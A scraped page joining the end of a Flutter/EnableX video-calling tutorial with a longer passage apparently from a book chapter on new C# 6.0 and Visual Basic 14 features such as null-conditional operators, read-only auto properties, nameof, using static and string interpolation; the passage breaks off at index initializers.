void _addEnxrtcEventHandlers() { EnxRtc.onRoomConnected = (Map<dynamic, dynamic> map) { setState(() { print('onRoomConnectedFlutter' + jsonEncode(map)); }); EnxRtc.publish(); }; EnxRtc.onPublishedStream = (Map<dynamic, dynamic> map) { setState(() { print('onPublishedStream' + jsonEncode(map)); EnxRtc.setupVideo(0, 0, true, 300, 200); }); }; EnxRtc.onStreamAdded = (Map<dynamic, dynamic> map) { print('onStreamAdded' + jsonEncode(map)); print('onStreamAdded Id' + map['streamId']); String streamId; setState(() { streamId = map['streamId']; }); EnxRtc.subscribe(streamId); }; EnxRtc.onActiveTalkerList = (Map<dynamic, dynamic> map) { print('onActiveTalkerList ' + map.toString()); final items = (map['activeList'] as List) .map((i) => new ActiveListModel.fromJson(i)); if(_remoteUsers.length>0){ for(int i=0;i<_remoteUsers.length;i++){ setState(() { _remoteUsers.removeAt(i); }); } } if (items.length > 0) { for (final item in items) { if(!_remoteUsers.contains(item.streamId)){ print('_remoteUsers ' + map.toString()); setState(() { _remoteUsers.add(item.streamId); }); } } print('_remoteUsersascashjc'); print(_remoteUsers); } }; EnxRtc.onUserConnected = (Map<dynamic, dynamic> map) { setState(() { print('onUserConnected' + jsonEncode(map)); }); }; }
Run The Project
Finally, let’s run the project J
- Run the following command in the root folder to install dependencies.
flutter packages get
- Run the project
flutter run
Hurray! Now you have a one-to-one video calling. With this app, you users can connect to a room to publish their stream and subscribe to remote streams.
In case, you want to find out more, visit EnableX Developer Hub or GitHub repository.
The post How To Build Video Calling App Using Flutter and EnableX appeared first on EnableX Insights.
Discussion (2)
thank for sharing | https://practicaldev-herokuapp-com.global.ssl.fastly.net/enablex/how-to-build-video-calling-app-using-flutter-and-enablex-96o | CC-MAIN-2021-21 | refinedweb | 1,091 | 50.53 |
Writing Client/Server WebSocket Application using Scala
Today I will explains how to quickly write a WebSocket application in Scala. I will show how easy it is to write both client and server side. For the client I will use the wCS library, and for the server I will use the Atmosphere’s WebSocket Framework. If you expect something complex, don’t read this blog!
OK let’s write a really simple application which echo messages received to all connected clients. Messages can be initiated by the client or by the server itself. In order to achieve that, we will use the Atmosphere Framework. If you aren’t familiar with Atmosphere, take a look at this introduction. What we need to define is a Scala class that will be invoked by the framework when a WebSocket message is received. With Atmosphere, it as simple as:
import javax.ws.rs.{POST, Path} import org.atmosphere.annotation.Broadcast @Path("/") class Echo { /** * Broadcast/Publish the WebSocket messages to all connection WebSocket clients. */ @POST @Broadcast def echo(echo : String) : String = { echo } }
The echo method will be invoked with a String arguments who represent a WebSocket message. The message will be distributed using an Atmosphere Broadcaster, which can be seen as a bi-directional channel of communication between clients and server. Looking for more code? Well, with Atmosphere you don’t need more on the server side as the framework take care of the WebSocket’s handshake and all the protocol details you don’t want to spend time on it.
Now on the client side, let’s use the wCS library (Asynchronous I/O WebSocket Client for Scala). First, let’s open a connection to the server
val w = new WebSocket w.open("ws://127.0.0.1/")
Once the WebSocket connection is established, we can now send message (as String or Bytes).
w.send("foo")
To receive WebSocket messages, all we need to do is to pass a Listener that will be invoked when the server echo messages
w.listener(new TextListener() { override def onMessage(s : String) { // Do something with the message } })
We can switch at any moment between String and Bytes, and associate as many Listener as we can. Note that the library is fully asynchronous and never the send operation is “non blocking”. We can fluidly write the code above by just doing:
val w = new WebSocket w.listener(new TextListener() { override def onOpen(){ // do something } override def onMessage(message: String) { // do something } override def onClose() { // do something } }).open("ws://127.0.0.1").send("foo")
That’s all. You just wrote your first WebSocket client/server application using Scala! For more information, ping me on Twitter!
Merci, pour ce petit tuto | https://jfarcand.wordpress.com/2012/02/10/writing-clientserver-websocket-application-using-scala/ | CC-MAIN-2015-22 | refinedweb | 451 | 65.12 |
As of now, my "Shipping Cost" calculator runs well on an infinite loop. Here's how I'd like the program to be, if possible: prompt the user for the Weight and the Distance 13 times, then, AFTER 13 prompts for user input of weight & distance, display the weight, the distance, and the cost to ship the item for each of their input, if possible in 13 different lines. Here's the current code as it is, on an infinite loop. The driver is below.
Ex:
//User prompts x 13
Weight: #.##
Distance: ###.#
Weight: ##
Distance: ##
.
.
.
//Report x 13
Weight: #.## Distance: ###.# Cost: ##.#
Weight: ## Distance: ## Cost: ##.#
.
.
.
public class ShippingCharges { private double weight; private double shippingDistance; //class declarations public ShippingCharges(){ } //mutators and accessors (setters and getters) public ShippingCharges(double weight, double shippingDistance) { this.weight = weight; this.shippingDistance = shippingDistance; } public double getShippingDistance() { return shippingDistance; } public void setShippingDistance(double shippingDistance) { this.shippingDistance = shippingDistance; } public double getWeight() { return weight; } public void setWeight(double weight) { this.weight = weight; } public double getShippingCharges(){ //Determines the rate by setting numPer500 = (distance/500.25), rounds up double numPer500=(double)((int)(shippingDistance/500.25)+1); //series of if statements to determine the shipping charges if(shippingDistance==0) return 0.00*numPer500; if(weight==0) return 0.00*numPer500; if(weight<=2) return 1.10*numPer500; if(weight>2&&weight<=6) return 2.20*numPer500; if(weight>6&&weight<=10) return 3.70*numPer500; if(weight>10) return 4.80*numPer500; return 0; } //API- toString: "This object, (which is already a string!), is itself returned." public String toString(){ return "Weight of package="+weight+"kg. Shipping distance="+shippingDistance+"km. Cost to send the package is $"+getShippingCharges(); } }
DRIVER
import java.util.Scanner; //import scanner class import java.text.NumberFormat; //NumberFormat class to help parse numbers import java.text.DecimalFormat; //DecimalFormat class to help format decimals public class TesterShippingCharges { public static void main(String[] args){ NumberFormat formatter = new DecimalFormat("#0.00"); ShippingCharges num = new ShippingCharges();//num finds out the multiplication Scanner scanner = new Scanner(System.in); // factor for the price ShippingCharges scan=new ShippingCharges(); while (true){ //Causes infinite loop System.out.print("Weight of package: "); // to continue prompting user. double weight = scanner.nextDouble(); //Retrieves user's input weight num.setWeight(weight); // and sets equal to weight. System.out.print("Distance to be sent: "); //Prompts user for distance double distance = scanner.nextDouble(); //Retrieves user's input distance num.setShippingDistance(distance); // and sets eual to distance scan.setWeight(weight); scan.setShippingDistance(distance); num.getShippingCharges(); System.out.println(scan); if (weight==10000) break; } } }
Thanks for reading! Thanks even more if you could help with a fix!
This post has been edited by MemoryLeak2013: 15 July 2010 - 02:20 PM | http://www.dreamincode.net/forums/topic/181721-print-a-report-after-instead-of-case-by-case/ | CC-MAIN-2018-17 | refinedweb | 439 | 53.58 |
- NAME
- VERSION
- DESCRIPTION
- OVERVIEW
- METHODS
- ATTRIBUTES
- AUTHOR
- CONTRIBUTOR
NAME
WWW::AdventCalendar - a calendar for a month of articles (on the web)
VERSION
version 1.112
DESCRIPTION
This is a library for producing Advent calendar websites. In other words, it makes four things:
a page saying "first door opens in X days" the calendar starts
a calendar page on and after the calendar starts
a page for each day in the month with an article
an Atom feed
This library was originally written just for RJBS's Perl Advent Calendar, so it assumed you'd always be publishing from Dec 1 to Dec 24 or so. It has recently been retooled to work across arbitrary ranges, as long as they're within one month. This feature isn't well tested. Neither is the rest of the code, to be perfectly honest, though...
OVERVIEW
To build an Advent calendar:
create an advent.ini configuration file
write articles and put them in a directory
schedule advcal to run nightly
advent.ini is easy to produce. Here's the one used for the original RJBS Advent Calendar:
title = RJBS Advent Calendar year = 2009 uri = editor = Ricardo Signes category = Perl category = RJBS article_dir = rjbs/articles share_dir = share
These should all be self-explanatory. Only
category can be provided more than once, and is used for the category listing in the Atom feed.
These settings all correspond to "ATTRIBUTES" in calendar attributes described below. A few settings below are not given above.
Articles are easy, too. They're just files in the
article_dir. They begin with an email-like set of headers, followed by a body written in Pod. For example, here's the beginning of the first article in the original calendar:
Title: Built in Our Workshop, Delivered in Your Package Topic: Sub::Exporter =head1 Exporting In Perl, we organize our subroutines (and other stuff) into namespaces called packages. This makes it easy to avoid having to think of unique names for
The two headers seen above, title and topic, are the only headers required, and correspond to those attributes in the WWW::AdventCalendar::Article object created from the article file.
Finally, running advcal is easy, too. Here is its usage:
Options given on the command line override those loaded form configuration. By running this program every day, we cause the calendar to be rebuilt, adding any new articles that have become available.
METHODS
build
$calendar->build;
This method does all the work: it reads in the articles, decides how many to show, writes out the rendered pages, the index, and the atom feed.
read_articles
my $article = $calendar->read_articles;
This method reads in all the articles for the calendar and returns a hashref. The keys are dates (in the format
YYYY-MM-DD) and the values are WWW::AdventCalendar::Article objects.
ATTRIBUTES
- title
The title of the calendar, to be used in headers, the feed, and so on.
- tagline
A tagline for the calendar, used in some templates. Optional.
- uri
The base URI of the calendar, including trailing slash.
- editor
The name of the calendar's editor, used in the feed.
The name of the calendar's default author, used for articles that provide none.
- year
The calendar year. Optional, if you provide
start_dateand
end_date.
- start_date
The start of the article-containing period. Defaults to Dec 1 of the year.
- end_date
The end of the article-containing period. Defaults to Dec 24 of the year.
- categories
An arrayref of category names for use in the feed.
- article_dir
The directory in which articles can be found, with names like YYYY-MM-DD.html.
The directory for templates, stylesheets, and other static content.
- output_dir
The directory into which output files will be written.
- today
The date to treat as "today" when deciding how much of the calendar to publish.
- tracker_id
A Google Analytics tracker id. If given, each page will include analytics.
AUTHOR
Ricardo SIGNES <[email protected]>
CONTRIBUTOR
Len Jaffe <[email protected]>
This software is copyright (c) 2015 by Ricardo SIGNES.
This is free software; you can redistribute it and/or modify it under the same terms as the Perl 5 programming language system itself. | https://metacpan.org/pod/WWW::AdventCalendar | CC-MAIN-2016-07 | refinedweb | 690 | 57.06 |
Created on 2014-09-19 19:00 by seberg, last changed 2015-02-01 14:28 by skrah. This issue is now closed.
In NumPy we decided some time ago that if you have a multi dimensional buffer, shaped for example 1x10, then this buffer should be considered both C- and F-contiguous. Currently, some buffers which can be used validly in a contiguous fashion are rejected.
CPython does not support this currently possibly creating smaller nuisance if/once we change it fully in NumPy, see for example
I have attached a patch which should (sorry I did not test this at all yet) relax the checks as much as possible. I think this is right, but we did some subtle breaks in user code (mostly cython code) when we first tried changing it, and while numpy arrays may be more prominently C/F-contiguous, compatibility issues with libraries checking for contiguity explicitly and then requesting a strided buffer are very possible.
If someone could give me a hint about adding tests, that would be great.
Also I would like to add a small note to the PEP in any case regarding this subtlety, in the hope that more code will take care about such subtleties.
There is another oddity: #12845. Does NumPy have a formal definition of
array contiguity somewhere?
BTW, if you have NumPy installed and run test_buffer in Python3.3+,
numpy.ndarray has many tests against memoryview and _testbuffer.ndarray
(the latter is our exegesis of PEP-3118).
#12845 should be closed, seems like a bug in some old version. The definition now is simply that the array is contiguous if you can legally access it in a contiguous fashion. Which means first stride is itemsize, second is itemsize*shape[0] for Fortran, inverted for C-order.
To be clear, the important part here, is that to me all elements *can* be accessed using that scheme. It is not correct to assume that `stride[-1]` or `stride[0]` is actually equal to `itemsize`.
In other words, you have to be able to pass the pointer to the start of a c-contiguous array into some C-library that knows nothing about strides without any further thinking. The 0-strides badly violate that.
Thanks, #12845 is indeed fixed in NumPy.
Why does NumPy consider an array with a stride that will almost
certainly lead to undefined behavior (unless you compile with
-fwrapv) as valid?
In CPython we try to eliminate these kinds of issues (though
they may still be present).
>>> import numpy as np
import io
x = np.arange(10)
y = np.array([x])
print(y.strides)
(9223372036854775807, 8)
>>>
>>>
>>> y.flags
C_CONTIGUOUS : True
F_CONTIGUOUS : True
OWNDATA : True
WRITEABLE : True
ALIGNED : True
UPDATEIFCOPY : False
Well, the 9223372036854775807 is certainly no good for production code and we would never have it in a release version, it is just there currently to expose if there are more problems. However I don't care what happens on overflow (as long as it is not an error).
Note that the stride here is on a dimension with shape 1. The only valid index is thus always 0 and 0*9223372036854775807=0, so the stride value does not actually matter when calculating offsets into the array. You could simply set it to 80 to get something that would be considered C-contiguous or to 8 to get something that is considered F-contiguous. But both is the case in a way, so just "cleaning up" the strides does not actually get you all the way.
Ok, so it is a debug thing in the current NumPy sources.
IMO ultimately the getbufferproc needs to return valid strides, even
if the first value isn't used.
For that matter, the getbufferproc is free to translate the multi-
dimensional corner case array to a one-dimensional array that is
automatically C and F-contiguous.
Does it matter if you lose some (irrelevant?) information about
the original array structure?
An extra dimension is certainly not irrelevant! The strides *are* valid
and numpy currently actually commonly creates such arrays when slicing.
The question is whether or not we want to ignore them for contiguity
checks even if they have no effect on the memory layout.
So there are three options I currently see:
1. Python also generalizes like I would like numpy to end up in the
future (the current patch should do that) and just don't care about such
strides, because the actual memory layout is what matters.
2. We say it is either too dangerous (which may very well be) or you
want to preserve Fortran/C-order information even when it does not
matter to the memory layout.
This leads to this maybe:
2a) we just keep it as it is and live with minor inconsistencies (or
never do the relaxed strides in numpy)
2b) We let these buffers return False on checking for contiguity but
*allow* allow fetching a buffer when C-/F-contiguous is explicitly asked
for when getting the buffer. Which is a weird middle way, but it might
actually be a pretty sane solution (have to think about it).
I think it would help discussing your options if the patch passes test_buffer
first. Currently it segfaults because shape can be NULL. Also, code in
memoryobject.c relies on the fact that ndim==0 means contiguous.
Then, it would help enormously if you give Python function definitions of
the revised C and F-contiguity.
I mean something like verify_structure() from Lib/test/test_buffer.py -- that
function definition was largely supplied by Pauli Virtanen, but I may have
added the check for strides-is-multiple-of-itemsize (which 2**63-1 usually
isn't, so the new debug numpy strides don't pass that test).
I am very sorry. The attached patch fixes this (not sure if quite right, but if anything should be more general then necessary). One test fails, but it looks like exactly the intended change.
Thanks! I still have to review the patch in depth, but generally
I'm +1 now for relaxing the contiguity check.
Curiously enough the existing code already considered e.g. shape=[1], strides=[-5] as contiguous.
Since the functions in abstract.c have been committed by Travis Oliphant:
Could there have been a reason why the {shape=[1], strides=[-5]}
case was considered but the general case was not?
Or is it generally accepted among the numpy devs that not considering
the general case was just an oversight?
Yeah, the code does much the same as the old numpy code (at least most of the same funny little things, though I seem to remember the old numpy code had something yet a bit weirder, would have to check).
To be honest, I do not know. It isn't implausible that the original numpy code dates back 15 years or more to numeric. I doubt whoever originally wrote it thought much about it, but there may be some good reason, and there is the safety considerations that people use the strides in a way they should not, which may trip us here in any case.
Ok, here's my take on the situation:
1) As far as Python is concerned, shape[0] == 1 was already special-cased, so
people could not rely on canonical Fortran or C strides anyway.
2) Accessing an element via strides should be done using PyBuffer_GetPointer(),
which can of course handle non-canonical strides.
3) Breakage will only affect NumPy users, since practically no one else is
using multidimensional arrays.
Regarding your option 2b): I think it may be confusing, the buffer protocol
is already so complicated.
So, I think purity wins here. If you are sure that all future NumPy versions
will ship with precise contiguity checks, then I'll commit the new patch in 3.5 (earlier versions should not be changed IMO).
I've moved the checks for 0 in shape[i] to the beginning (len == 0). I hope
there are no applications that set len incorrectly, but they would be severely
broken anyway.
FWIW, I think it would be good to make this change early in the
3.5 release cycle, so issues can be found. Sebastian, do you
have an idea when the change will be decided in numpy?
Regarding the discussion here ...
... about the special stride marker:
In the case of slicing it would be nice to use the "organic" value
that would arise normally from computing the slice. That helps in checking other PEP-3118 implementations like Modules/_testbuffer.c
against numpy.
Numpy 1.9. was only released recently, so 1.10. might be a while. If no
problems show up during release or until then, we will likely switch it
by then. But that could end up being a year from now, so I am not sure
if 3.6 might not fit better. The problems should be mostly mitigated on
our side. So bug-wise it shouldn't be a big issue I would guess.
I will try to look at it more soon, but am completly overloaded at least
for the next few days, and maybe some other numpy devs can chip in. Not
sure I get your last point, slicing should give the "organic" values
even for the mangled up thing with relaxed strides on (currently)?!
Okay, the whole thing isn't that urgent either.
Sorry for the confusion w.r.t slicing: I misremembered what the
latest numpy version did:
a)
>>> x = np.array([[1,2,3,]])
>>> x.strides
(9223372036854775807, 8)
b)
>>> x = np.array([[1,2,3], [4,5,6]])[:1]
>>> x.strides
(24, 8)
Somehow I thought that case b) would also produce the special marker,
but it doesn't, so all is well.
Is this related to the NPY_RELAXED_STRIDES_CHECKING compilation flag?
@pitrou, yes of course. This would make python do the same thing as numpy does (currently only with that compile flag given).
About the time schedule, I think I will try to see if some other numpy dev has an opinion. Plus, should look into documenting it for the moment, so that someone who reads up on the buffer protocol should get things right.
Like Stefan I think this would be good to go in 3.5. The PyBuffer APIs are relatively new so there shouldn't be a lot of breakage.
Antoine, sounds good to me, I don't mind this being in python rather sooner then later, for NumPy itself it does not matter I think. I just wanted to warn that there were problems when we first tried to switch in NumPy, which, if I remember correctly, is now maybe 2 years ago (in a dev version), though.
New changeset 369300948f3f by Stefan Krah in branch 'default':
Issue #22445: PyBuffer_IsContiguous() now implements precise contiguity | https://bugs.python.org/issue22445 | CC-MAIN-2017-51 | refinedweb | 1,802 | 72.16 |
A whimsical “nugget”
If net present value (NPV) is inversely proportional to the discounting rate, then there must exist a discounting rate that makes NPV equal to zero.
The discounting rate that makes net present value equal to zero is called the “internal rate of return (IRR)” or “yield to maturity”.
To apply this concept to capital expenditure, simply replace “yield to maturity” by “IRR”, as the two terms mean the same thing. It is just that one is applied to financial securities (yield to maturity) and the other to capital expenditure (IRR).
To calculate IRR, make r the unknown and simply use the NPV formula again. The rate r is determined as follows:
To use the same example from the previous chapter:
In other words, an investment's internal rate of return is the rate at which its market value is equal to the present value of the investment's future cash flows.
It is possible to use trial-and-error to determine IRR. This will result in an interest rate that gives a negative net present value and another that gives a positive net present value. These negative and positive values constitute a range of values which can be narrowed until the yield to maturity is found; in this case ...
No credit card required | https://www.safaribooksonline.com/library/view/corporate-finance-theory/9781119975588/30_chap17.html | CC-MAIN-2018-30 | refinedweb | 216 | 58.42 |
On Mon, Dec 1, 2008 at 8:29 AM, Jeff Law <[email protected]> wrote: > Vladimir Makarov wrote: >> >> The following patch solves a latent reload bug (in reload inheritance) >> triggered by IRA. It is a second version (less pessimistic in reload >> inheritance optimization) of the patch >> >> The problem is described on >> >> >> >> >> The patch invalidates reg_last_reload_reg set in previous insns for >> INC/DEC if reg_last_reload_reg set is not set for the current insn for some >> reasons (e.g. the hard register is used in other insn reloads besides reload >> for INC/DEC). >> >> The patch was tested on SH (with -m4 -ml -O3 -fomit-frame-pointer) and >> successfully bootstrapped on itanium (another port using INC/DEC heavily). >> >> >> Ok to commit? >> >> 2008-11-25 Vladimir Makarov <[email protected]> >> >> PR rtl-optimization/37514 >> * reload1.c (reload_as_needed): Invalidate reg_last_reload >> from previous insns. >> >> > This is fine. However, at this stage we should be more focused on the > simpler, safer fix rather than picking up these uncommon > micro-optimizations. > Jeff > I need this patch. Otherwise, bootstrap will fail on Linux/x86 with: cc1: warnings being treated as errors /net/gnu-6/export/gnu/src/gcc-ira/gcc/gcc/reload1.c: In function 'reload_as_needed': /net/gnu-6/export/gnu/src/gcc-ira/gcc/gcc/reload1.c:4167: error: unused variable 'old_prev' Index: ChangeLog.ira =================================================================== --- ChangeLog.ira (revision 142324) +++ ChangeLog.ira (working copy) @@ -1,3 +1,8 @@ +2008-12-01 H.J. Lu <[email protected]> + + * reload1.c (reload_as_needed): Declare old_prev only if + AUTO_INC_DEC is defined. + 2008-12-01 Vladimir Makarov <[email protected]> PR rtl-optimization/37514 Index: reload1.c =================================================================== --- reload1.c (revision 142324) +++ reload1.c (working copy) @@ -4164,7 +4164,9 @@ reload_as_needed (int live_known) rtx prev = 0; rtx insn = chain->insn; rtx old_next = NEXT_INSN (insn); +#ifdef AUTO_INC_DEC rtx old_prev = PREV_INSN (insn); +#endif /* If we pass a label, copy the offsets from the label information into the current offsets of each elimination. */ -- H.J. | https://gcc.gnu.org/pipermail/gcc-patches/2008-December/252614.html | CC-MAIN-2021-43 | refinedweb | 318 | 51.34 |
There are many ways to find the square root of a number in Python.
Table of Contents
1. Using Exponent Operator for Square Root of a Number
num = input("Please enter a number:\n") sqrt = float(num) ** 0.5 print(f'{num} square root is {sqrt}')
Output:
Please enter a number: 4.344 4.344 square root is 2.0842264752180846 Please enter a number: 10 10 square root is 3.1622776601683795
I am using float() built-in function to convert the user-entered string to a floating-point number.
The input() function is used to get the user input from the standard input.
2. Math sqrt() function for square root
Python math module sqrt() function is the recommended approach to get the square root of a number.
import math num = 10 num_sqrt = math.sqrt(num) print(f'{num} square root is {num_sqrt}')
Output:
Python Square Root Of Number
3. Math pow() function for square root
It’s not a recommended approach. But, the square root of a number is the same as the power of 0.5.
>>> import math >>> >>> math.pow(10, 0.5) 3.1622776601683795 >>>
4. Square Root of Complex Number
We can use cmath module to get the square root of a complex number.
import cmath c = 1 + 2j c_sqrt = cmath.sqrt(c) print(f'{c} square root is {c_sqrt}')
Output:
(1+2j) square root is (1.272019649514069+0.7861513777574233j)
5. Square Root of a Matrix / Multidimensional Array
We can use NumPy sqrt() function to get the square root of a matrix elements. | https://www.journaldev.com/32175/python-square-root-number | CC-MAIN-2021-17 | refinedweb | 255 | 84.27 |
Data::asXML - convert data structures to/from XML
use Data::asXML; my $dxml = Data::asXML->new(); my $dom = $dxml->encode({ 'some' => 'value', 'in' => [ qw(a data structure) ], }); my $data = $dxml->decode(q{ <HASH> <KEY name="some"><VALUE>value</VALUE></KEY> <KEY name="in"> <ARRAY> <VALUE>a</VALUE> <VALUE>data</VALUE> <VALUE>structure</VALUE> </ARRAY> </KEY> </HASH> }); my (%hash1, %hash2); $hash1{other}=\%hash2; $hash2{other}=\%hash1; print Data::asXML->new->encode([1, \%hash1, \%hash2])->toString; <ARRAY> <VALUE>1</VALUE> <HASH> <KEY name="other"> <HASH> <KEY name="other"> <HASH href="../../../../*[2]"/> </KEY> </HASH> </KEY> </HASH> <HASH href="*[2]/*[1]/*[1]"/> </ARRAY>
For more examples see t/01_Data-asXML.t.
experimental, use at your own risk :-)
There are couple of modules mapping XML to data structures. (XML::Compile, XML::TreePP, XML::Simple, ...) but they aim at making data structures adapt to XML structure. This one defines couple of simple XML tags to represent data structures. It makes the serialization to and from XML possible.
For the moment it is an experiment. I plan to use it for passing data structures as DOM to XSLT for transformations, so that I can match them with XPATH similar way how I access them in Perl.
/HASH/KEY[@name="key"]/VALUE /HASH/KEY[@name="key2"]/ARRAY/*[3]/VALUE /ARRAY/*[1]/VALUE /ARRAY/*[2]/HASH/KEY[@name="key3"]/VALUE
If you are looking for a module to serialize your data, without requirement to do so in XML, you should probably better have a look at JSON::XS or Storable.
(default 1 - true) will insert text nodes to the XML to make the output indented.
(default undef - false)
in case of
encode() perform the xml string decoding back and will compare the two data structures to be sure the data can be reconstructed back without errors.
in case of a
decode() it will decode to data then encode to xml string and from xml string decode back to data. this two data values are then compared.
Both compares is done using Test::Deep::NoTest::eq_deeply.
(default undef - false)
adds xml:ns attribute to the root element. if
namespace is set to 1 the xml:ns will be otherwise it will be the value of
namespace.
Object constructor.
From structure
$what generates XML::LibXML::Document DOM. Call
->toString to get XML string. For more actions see XML::LibXML.
Takes
$xmlstring and converts to data structure.):
Lars Dɪᴇᴄᴋᴏᴡ 迪拉斯 Emmanuel Rodriguez
* int, float encoding ? (string enough?) * XSD * anyone else has an idea? * what to do with blessed? do the same as JSON::XS does?
Please report any bugs or feature requests to
bug-data-asxml at rt.cpan.org, or through the web interface at. I will be notified, and then you'll automatically be notified of progress on your bug as I make changes.
You can find documentation for this module with the perldoc command.
perldoc Data::asXML
You can also look for information at:
This program is free software; you can redistribute it and/or modify it under the terms of either: the GNU General Public License as published by the Free Software Foundation; or the Artistic License.
See for more information. | http://search.cpan.org/~jkutej/Data-asXML-0.07/lib/Data/asXML.pm | CC-MAIN-2017-30 | refinedweb | 523 | 65.42 |
The .NET Languages
- What's New in C# 6.0 and VB 14
-. Of course, you may also need to know many other things such as XAML, Hypertext Markup Language (HTML), Cascading Style Sheets (CSS), TypeScript, JavaScript (and related frameworks), C++, F#, and LightSwitch. Today’s developer likely does not code in a single language syntax. However, VB and C# are still at the core of most Visual Studio development.
In this chapter, we set aside the IDE (for the most part) and focus on the foundations of .NET programming in C# and Visual Basic. We start by highlighting new features of the languages for those who are already familiar with C# and VB. We then include a language primer as a review of some basic .NET programming tasks. We then cover some more in-depth programming features, enhancements to C# 6.0 and VB 14, and language-related IDE enhancements. The chapter concludes with an overview and map of the .NET Framework class library.
What’s New in C# 6.0 and VB 14
This section is for developers looking for highlights on what’s new about the C# and Visual Basic languages. For those who need the basics (or a refresher), we suggest you start by reading the “Language Primer” section a little later in this chapter. You can then return here to see what additions exist to the primer.
In general, the language changes are small additions that help you write cleaner code. They simplify coding by eliminating unnecessary, repetitive code. The changes also make the code easier to read and understand.
Null-Conditional Operators
One of the most repetitive tasks you do as a programmer is to check a value for null before you work with it. The code to do this checking is typically all over your application. For example, the following verifies whether properties on an object are null before working with them. (For a more complete discussion of all operators, see the section “Understanding Operators” later in this chapter.)
C#
public bool IsValid() { if (this.Name != null && this.Name.Length > 0 && this.EmpId != null && this.EmpId.Length > 0) { return true; } else { return false; } }
VB
Public Function IsValid() As Boolean If Me.Name IsNot Nothing AndAlso Me.Name.Length > 0 AndAlso Me.EmpId IsNot Nothing AndAlso Me.EmpId.Length > 0 Then Return True Else Return False End If End Function
Both C# 6.0 and VB 14 now allow automatic null checking using the question mark dot operator (?.). This operator tells the compiler to check the information that precedes the operator for null. If a null is found in an If statement for example, the entire check is considered false (without additional items being checked). If no null is found, then do the work of the dot (.) to check the value. The code from earlier can now be written as follows:
C#
public bool IsValid() { if (this.Name?.Length > 0 && this.EmpId?.Length > 0) { return true; } else { return false; } }
VB
Public Function IsValid2() As Boolean If Me.Name?.Length > 0 AndAlso Me.EmpId?.Length > 0 Then Return True Else Return False End If End Function
The null-conditional operator cleans up code in other ways. For instance, when you trigger events, you are forced to copy the variable and check for null. This can now be written as a single line. The following code shows both the old way and the new way of writing code to trigger events in C#.
C#
//trigger event, old model { var onSave = OnSave; if (onSave != null) { onSave(this, args); } } //trigger event using null-conditional operator { OnSave?.Invoke(this, args); }
ReadOnly Auto Properties
Auto properties have been a great addition to .NET development. They simplify the old method of coding properties using a local variable and a full implementation of get and set. See “Creating an Automatically Implemented Property” in the later section “Language Features.”
However, up until 2015, auto properties required both a getter and a setter; this makes it hard to use them with immutable data types. The latest release now allows you to create auto properties as read only (with just the get). A read-only backing field is created behind the scenes on your behalf. The following shows an example of a full property, a standard auto property, and the new read-only auto property.
C#
Public class Employee { //full property private string name; public string Name { get { return name; } set { name = value; } } //standard auto property public string Address { get; set; } //read-only auto property public string EmpId { get; } }
VB
Public Class Employee 'full property Private _name As String Public Property Name() As String Get Return _name End Get Set(ByVal value As String) _name = value End Set End Property 'standard auto property Public Property Address As String 'read-only auto property Public ReadOnly Property EmpId As String End Class
Read-only auto properties can be assigned from the constructor. Again, they have a hidden backing field. The compiler knows this field exists and thus allows this assignment. The following shows a constructor inside the Employee class shown above assigning the read-only EmpId property. Notice that, in Visual Basic, the Sub New constructor must be used to assign a read-only property.
C#
public Employee(string id) { EmpId = id; }
VB
Public Sub New(ByVal id As String) EmpId = id End Sub
You can also initiate read-only auto properties at the time of their creation (just like the field that backs them), as shown next. Note that if you were to combine this assignment with the previous constructor code (that initialized the read only property), the object creation would happen first. Thus, the constructor init would take precedence.
C#
public string EmpId { get; } = "NOT ASSIGNED";
VB
Public ReadOnly Property EmpId As String = "NOT ASSIGNED"
NameOf Expression
You now have access to the names of your code elements, such as variables and parameters. The .NET languages use the NameOf expression to enable this feature.
Prior to 2015, you often had to indicate the name of a program element by enclosing it in a string. However, if the name of that code element changed, you had an error lurking in your code (unless you managed to remember to change the string value). For example, consider the following code that throws an instance of ArgumentNullException. This class takes a string as the name of the argument. It then uses the string value to find your program element; it’s not strongly typed programming at all.
C#
public void SaveFeedback(string feedback) { if (feedback == null) { //without nameOf throw new ArgumentNullException("feedback"); } }
VB
Public Sub SaveFeedback(ByVal feedback As String) If feedback Is Nothing Then 'without nameOf Throw New ArgumentNullException("feedback") End If End Sub
The NameOf expression eliminates this issue. You can use the expression along with your actual, scoped code element to pass the name of your code element as a string. However, NameOf uses the actual type to reference the name. Therefore, you get compile-time checking and rename support. The following shows an example of throwing the same exception as used earlier but using NameOf.
C#
throw new ArgumentNullException(nameof(feedback));
VB
Throw New ArgumentNullException(NameOf(feedback))
Using (Imports) Statics
The using statement (Imports in VB) allows developers to declare namespaces that are in scope; thus, classes in the namespace do not need to be fully qualified inside your code. (See “Organizing Your Code with Namespaces” later in this chapter.) You can now use the same statement with static classes. To do so, in C# you must include the static keyword as in “using static.” In Visual Basic, you simply use Imports and then specific the static library.
The ability to indicate using (Imports in VB) with a static class tells the compiler that the class and its members are now in scope. This allows you to call a method of the static class without referencing the namespace or even the class name inside your code.
As an example, consider the static class System.Math. You could add a using statement to the top of your code file. In that case, calls to the static methods would no longer need to be qualified by namespace and class. Instead, you could call the method directly. The following shows the difference between the two approaches.
C#
using static System.Math; ... //use the static method, round without using return System.Math.Round(bonus, 0); //use the static method return Round(bonus, 0);
VB
Imports System.Math ... 'use the static method, round without imports Return System.Math.Round(bonus, 0) 'use the static method Return Round(bonus, 0)
String Interpolation
The .NET languages allow you to replace portions of a string with values. To do so, you use String.Format or StringBuilder.AppendFormat. These methods allow you to use placeholders as numbers inside curly braces. These numbers are replaced in series by the values that follow. This is cumbersome to write and can lead to confusion.
In 2015, the code editor allows you to put the variable right in the middle of the string. You do so using the format that starts the string with a dollar sign ($) as an escape character. You can then add curly braces within the string to reference variables, as in {value}. The editor gives you IntelliSense for your values, too. The call to String.Format then happens for you behind the scenes. The example that follows shows how the previous use of String.Format is now simplified with enhanced string literals.
C#
//old style of String.Format return String.Format("Name: {0}, Id: {1}", this.Name, this.EmpId); //string interpolation style return ($"Name: {this.Name}, Id: {this.EmpId}");
VB
'old style of String.Format Return String.Format("Name: {0}, Id: {1}", Me.Name, Me.EmpId) 'string interpolation style Return $"Name: {Name}, Id: {EmpId}"
Lambda Expressions as Methods (C# Only)
Methods, properties, and other bits of code can now be assigned using lambda expression syntax (in C# only). (See “Write Simple Unnamed Functions Within Your Code (Lambda Expressions)” later in this chapter.) This makes writing and reading code much easier. The following shows a full method implementation as a lambda and a single expression. Notice that we use the string interpolation discussed in the prior section.
C#
public override string ToString() => $"Name: {this.Name}, Id: {this.EmpId}";
Index Initializers (C# Only)
